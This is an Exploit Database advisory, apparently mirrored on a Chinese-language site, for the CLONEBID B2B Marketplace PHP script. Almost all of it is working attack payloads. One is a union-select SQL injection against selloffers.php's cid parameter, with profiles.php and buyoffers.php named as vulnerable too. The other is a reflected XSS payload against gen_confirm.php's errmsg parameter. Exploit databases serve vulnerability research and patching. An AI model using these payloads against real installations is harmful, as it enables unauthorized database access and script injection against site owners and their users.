CLONEBID B2B Marketplace – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Hamza 'MizoZ' N.
  日期： 2010-01-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11162/

• /*
  
  Name : CLONEBID B2B Marketplace
  Vendor : http://www.clonebid.com
  
  Author : Hamza 'MizoZ' N.
  Email : mizozx[at]gmail[dot]com
  
  Greetz : Zuka !
  
  */
  
  # SQL Injection :
  
  File : selloffers.php , Get : cid
  
  [HOST]/[PATH]/selloffers.php?cid=[INJECTION]
  
  Demo : http://server/selloffers.php?cid=-14+union+select+1,version%28%29,3,4,5,6,7,8--
  
  !!! : Same vuln => profiles.php & buyoffers.php
  
  # XSS :
  
  [HOST]/[PATH]/gen_confirm.php?errmsg=[SCRIPT :)]
  
  Demo : http://server/gen_confirm.php?errmsg=%3Cscript%3Ealert%281337%29;%3C/script%3E